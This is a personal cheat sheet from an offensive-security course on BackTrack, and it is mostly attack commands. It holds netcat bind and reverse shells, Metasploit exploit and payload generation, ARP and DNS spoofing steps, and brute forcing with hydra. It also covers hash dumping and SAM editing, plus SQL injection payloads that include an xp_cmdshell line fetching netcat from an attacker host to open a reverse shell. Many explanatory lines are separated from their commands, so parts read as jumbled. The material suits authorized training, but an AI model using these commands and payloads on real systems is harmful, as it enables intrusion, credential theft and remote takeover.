Scanning
scanrand -b10M targetIP:quick
nmap:
-sS
-sT
-sU
-PS
-PA
-PN
-n
-A
-O
-sV
-p
-T
-iL
-oG
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p open ports -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP
amap:
Take the results from nmap and check for services on uncommon ports.
amap -i scan.txt
Last modified: 11-2-08
Here are my personal notes from the Offensive-Security 101 course using BackTrack 2. This was an excellent course and I highly recommend taking it! As I learn more, I have decided to update this page with more info.
TFTP
attack box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/
target box
tftp -i 10.1.1.2 GET nc.exe
TFTP copies files with read only attributes. So to delete the file:
attrib -r nc.exe
del nc.exe
get a new IP address
release IP address
bring up the NIC
get a new IP address
set IP address & sub net mask
set default gateway
set DNS server
start server on TCP port 80
stop server
generate ssh keys
start server on TCP port 22
stop server
start server on UDP port 69 with a root directory of tmp
stop server
start server on TCP port 5901
stop server
show listening TCP ports
show listening UDP ports
verify ssh has started
verify tftp has started
umount share
create a new file and open it
exit
save modified buffer
write changes
make the file executable
run the file
method 2: bzip2 -cd program.tar.bz2 | tar xvf -
contact info, emails, dates, name servers
IP address of web server
network range
maps a domain to an IP address
maps an IP address to a domain
server name for a delegated zone
zone transfer and record caching
used to locate services in the network
SMTP server
zone transfer
TCP SYN scan or Stealth, half open (default)
TCP full connect (very noisy)
UDP scan
SYN packet discovery (best against stateful firewalls)
ACK packet discovery (best against stateless firewalls)
don't ping
no reverse DNS lookup
combines -O and -sV
OS fingerprinting
service version (banner)
ports to scan (T:port,U:port)
timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
input list of hosts to scan
grepable output to a file
use interface eth0, don’t display unknown signatures, promiscuous
read traffic on p0f
check if the port is open
telnet may yield slightly different results
downloads the index.html file
view file one page at a time, space bar for next page
exit file
check to see if NetBIOS is enabled
name, OS and workgroup
list users
list shares
start a NULL session
view shares
enumerate shares
connect to open share with a blank user name
connect to open share with user name admin
start a NULL session
enumerate shares
enumerate users
enumerate domain SIDs
user info, try 500, 501, 1000, 1001
create user account
update modules
open a browser to 127.0.0.1:55555
show all exploits
search for an exploit
set RHOST 10.1.1.2
set LHOST 10.1.1.1
set TARGET 0
you may need to run exploit more than once to work
list sessions
sessions -i 4, interact with session 4
detach from session
kill a session
list exploit jobs running
kill all jobs
import Nessus results in NBE format
import nmap results in XML format (-oX)
run nmap through the framework and store results in database
show hosts discovered
show services running on each host
show options
select modules based on open ports, show matching exploits, exploit
search for an exploit or auxiliary
summary info
Networking
dhcpcd
Renew dynamic IP address:
dhcpcd -k
ifconfig eth0 up
dhcpcd
Static IP address:
ifconfig eth0 192.168.0.100/24
route add default gw 192.168.0.1
echo nameserver 192.168.0.1 > /etc/resolv.conf
Table of Contents
Networking
Services
Basics
Footprinting
Scanning
Windows Enumeration
ARP Spoofing
Exploits
Metasploit Framework 3
What to do after gaining a remote shell
TFTP
Netcat
Passwords
Physical Access
SQL Injection
Alternate Data Streams
A White Hat’s Pen Test
Services
Apache server:
apachectl start
apachectl stop
SSH server:
sshd-generate
/usr/sbin/sshd
pkill sshd
ssh user@targetIP
TFTP server:
atftpd --daemon --port 69 /tmp/
pkill tftpd
VNC server:
vncserver
pkill Xvnc
Check what ports are listening:
netstat -ant
netstat -anu
netstat -ant | grep 22
netstat -anu | grep 69
Footprinting
Whois:
whois target.com
ping www.target.com
whois targetIP
DNS:
dig target.com any
A
PTR
NS
SOA
SRV
MX
host -l target.com <name server>
OS Fingerprinting
p0f -i eth0 -U -p
point a browser to the targetIP
xprobe2 -B targetIP
Banner Grabbing
nc targetIP port
nc 10.1.1.2 80
telnet targetIP port
HEAD /HTTP/1.0
<enter 2x>
wget targetIP
cat index.html | more
q
Windows Enumeration
nmap -sS -p 139,445 targetIP
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP
smbgetserverinfo -i targetIP
smbdumpusers -i targetIP
smbclient -L //targetIP
Using Windows
net use \\targetIP\ipc$ "" /u:""
net view \\targetIP
smbclient:
smbclient -L hostName -I targetIP
smbclient -L hostName/share -U ""
smbclient -L hostName -I targetIP -U admin
rpcclient:
rpcclient targetIP -U “”
netshareenum
enumdomusers
lsaenumsid
queryuser RID
createdomuser
ARP Spoofing
ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines under iptables.
Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this two times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0
dns spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.
Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
Metasploit Framework 3
svn update
Web Interface:
./msfweb
Console:
./msfconsole
help
show exploits
search <name>
use <exploit name>
show options
set <OPTION NAME> <option>
show payloads
set PAYLOAD <payload name>
show options
set <OPTION NAME> <option>
show targets
set TARGET <target number>
exploit
sessions -l
sessions -i <id>
<ctrl> z
<ctrl> c
jobs
jobs -K
Auxiliary scanners:
show auxiliary
use <auxiliary name>
set <OPTION NAME> <option>
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
Payloads:
Attacker behind firewall: bind shell
Target behind firewall: reverse shell
Automated:
db_import_nessus_nbe
db_import_nmap_xml
./start-db-autopwn
su - postgres
cd /pentest/exploit/framework3
./msfconsole
load db_postgres
db_create
db_nmap targetIP
db_hosts
db_services
db_autopwn
db_autopwn -t -p -e
Command Line Interface:
./msfcli | grep -i <name>
./msfcli <exploit or auxiliary> S
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
Payload generator:
./msfpayload <payload> <variable=value> <output type>
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X executable (Windows only)
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
Encode shellcode:
./msfencode <options> <variable=value>
Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l
Choose the PexFnstenvMor encoder and format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c
What to do after gaining a remote shell
hostname
net users
net user x hack /add
net user x /add
net localgroup
net localgroup administrators
net localgroup administrators x /add
Don't use interactive programs like FTP from a remote shell.
name of computer
list users
add user "x" with password "hack"
add user "x" with NO password
list security groups
list users in Administrators group
add user "x" to Administrators group
Netcat
attacker: 10.1.1.1
target: 10.1.1.2
Port scanner:
nc -v -z 10.1.1.2 1-1024
Chat session:
target: nc -lvp 4444
attacker: nc -v 10.1.1.2 4444
Transfer file to target:
target: nc -lvp 4444 > output.txt
attacker: nc -v 10.1.1.2 4444 < test.txt
Bind shell:
target: nc -lvp 4444 -e cmd.exe
attacker: nc -v 10.1.1.2 4444
Reverse shell:
target: nc -lvp 4444
attacker: nc -v 10.1.1.2 4444 -e /bin/bash
The target should be sitting at an invisible command prompt of the attacker.
You will not see a prompt. Issue any linux command to verify.
scan ports 1 to 1024
start Netcat and listen verbosely on port 4444
should be sitting at a command prompt of the target
Passwords
Word list:
zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l
About 306,000 passwords.
Brute force:
ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp
pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3
snmp
hydra -P words -v targetIP snmp
Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
Use wget to download specific files.
wget -r www.target.com --accept=pdf
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM file:
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair
Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x
C:\WINDOWS\system32> pwdump \\127.0.0.1
John the Ripper:
Paste the hashes into a new file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
Rainbow Tables:
rcrack *.rt -f hash.txt
Before you begin, change your root password using passwd.
Basics
Mount a local hard drive:
mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1
Mount a Windows network share:
share <user> <targetIP> <remote share>
share admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share
Edit a file:
nano test.sh
<ctrl> x
y
<enter>
chmod 755 test.sh
./test.sh
Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom
Install a new program:
tar zxvf program.tar.gz
cd to the new program folder
./configure
make
su root
make install
Exploits
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i exploit
Some versions may be written for compilation under Windows, while others for Linux.
You can identify the environment by inspecting the headers.
cat exploit | grep "#include"
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
Grep out Windows headers, to leave only Linux based exploits:
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u
Oracle
MS SQL
version of Sqlservr.exe
2000.80.194.0
2000.80.384.0
2000.80.534.0
2000.80.760.0
2000.80.760.0
2000.80.00.2039
2005.90.1399
2005.90.2047
2005.90.3042
minus minus closes the SQL query, everything after it is ignored
SQL Injection
nmap -sS -p 1521 targetIP
nmap -sS -p T:1433,U:1434 targetIP
Release
SQL Server 2000 RTM
SQL Server 2000 SP1
SQL Server 2000 SP2
SQL Server 2000 SP3
SQL Server 2000 SP3a
SQL Server 2000 SP4
SQL Server 2005 RTM
SQL Server 2005 SP1
SQL Server 2005 SP2
Authentication bypass:
' or 1=1--
Enumerating table names:
' having 1=1--
' group by table having 1=1--
' group by table, table2 having 1=1--
' group by table, table2, table3 having 1=1--
Enumerating column types:
union select sum(column) from table --
union select sum(column2) from table --
Adding data:
' ; insert into table values('value','value2','value3')--
MS SQL stored procedure:
Output the database info into an html file, that you can view with a browser.
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --
Run ipconfig on target and write to a file, that you can view with a browser.
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' ;--
Upload netcat and spawn a reverse shell.
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; --
attacker: nc -lvp 53
-f switch will read pwdump files
backup copy not locked by the OS
Where x is Channel created.
A White Hat's Pen Test by Muts
nslookup
set type=ns
set type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum
Solarwinds
tftp the router config file
Use a perl script to decrypt the passwords
Find internal mail server in config file.
nc -n internalserver.com 80
Edit config file to open more port on the router, 135,139,445,1000
Use Metasploit to send RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1>hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes with rainbow table.
Use Remote Desktop to connect to server.
Alternate Data Streams
Hide netcat inside a text file. Note netcat must be located in the current directory.
echo "This is a test" > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
start ./test.txt:nc.exe
Physical Access
Mount a NTFS share in read/write mode:
Boot your box with Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1
Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt
Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
unmount /mnt/sda1
reboot
host
pointer
name server
start of authority
service locator
